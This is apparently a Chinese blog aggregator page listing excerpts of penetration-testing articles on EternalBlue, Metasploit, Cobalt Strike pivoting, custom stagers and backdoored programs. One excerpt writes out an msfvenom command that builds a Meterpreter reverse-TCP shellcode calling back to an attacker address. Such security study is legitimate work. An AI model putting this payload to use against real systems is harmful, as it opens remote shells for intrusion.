课前声明:1、本分享仅做学习交流,请自觉遵守法律法规!2、搜索:Kali与编程,学习更多网络***干货!基础知识介绍:1.何为永恒之蓝?永恒之蓝(EternalBlue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被***的计算机。甚至于2017年5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了
错误信息: [-] ***rting the Metasploit framework console...| [-] * WARNING: No database support: No database YAML file 错误原因:第一次启动和使用Matasploit框架的时候没有经行MSF数 ...
分类:
Web程序 时间:
2020-08-19 19:50:50
阅读次数:
75
cs 多层代理+msf(frp代理)联合 ##1.cs多层代理 ###目标机器: 第一层目标机器: 10.211.55.0 (通外网) 10.10.10.1 第二层目标机器: 10.10.10.2 (纯内网,不通外网) 当目标多层内网的时候,如何把每一层机器都上线到cs端呢, 如果是msf直接可以一 ...
分类:
其他好文 时间:
2020-08-10 16:14:17
阅读次数:
80
缺点: 编译成exe以后体积过大 实现: msf生成shellcode代码: msfvenom -p windows/meterpreter/reverse_tcp --encrypt base64 LHOST=192.168.3.60 LPORT=3333 -f c 将payload给copy下来 ...
分类:
编程语言 时间:
2020-07-11 09:26:03
阅读次数:
85
在日常开发中总是和各种 API 打交道,我们名为前端工程师实为 API 调用工程师。这篇文章我就分享 7 个有趣的 API,你若通过阅读这篇文章对前端增加一点点的乐趣,对我来说也是一种鼓励。这些API在不同的浏览器中兼容性也不一样,使用前请仔细审查。 API使用示例 我们先看下其中几个API的实战效 ...
采用c开发stagers 前言 之前有写过一篇 [metasploit payload运行原理浅析(sockedi调用约定是什么)],里面有提到以后了解这些东西后可以做的事情,其实包括但不限于自写stagers,扩展C2 实现。本系列将从之前这篇文章中获取到的原理性知识进行实践,一步步记录我在这个过 ...
分类:
其他好文 时间:
2020-06-23 19:28:46
阅读次数:
64
Metasploit是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大***测试框架。命令行下使用Metasploit运行后首先看到的是Metasploit欢迎界面,我们输入“?”得到在线帮助。左面显示的是溢出程序的程序名称,右面是相应的简介。可以看到Metasploit中带的溢出程序包还是很多的,完全可以满足我们日常***的需要,以后我
分类:
Web程序 时间:
2020-06-18 16:23:54
阅读次数:
74
概述 Metasploitable3是Metasploitable2的升级版本,它是一个虚拟靶机系统,里面含有大量未被修复的安全漏洞,它主要是用于metasploit-framework测试的漏洞目标。众所周知Metasploitable2由于年久失修,被更好的Metasploitable3给取代了 ...
分类:
Web程序 时间:
2020-06-16 13:01:08
阅读次数:
84
关于制作有后门的程序 靶机:win7 192.168.147.149 攻击机:kali 192.168.147.133 第一次尝试 启动msf,使用msfvenom制作木马 详解: 通过一些方法将生成的木马文件上传到靶机(这里使用网盘) 之后启动handler进行监听,在win7上运行木马,没有反应 ...
分类:
Web程序 时间:
2020-06-15 22:33:10
阅读次数:
66
前言 上个星期有人在QQ群问到CobaltStrike里的一个功能Browser Pivoting,官方文档。有没有Chrome版的(自带的字支持IE浏览器),我隐隐约约记得Metasploit里有一个模块,但是这个是chrome debugger的辅助模块,平时也写前端,会用到chrome浏览器调 ...
分类:
其他好文 时间:
2020-06-13 23:40:21
阅读次数:
108
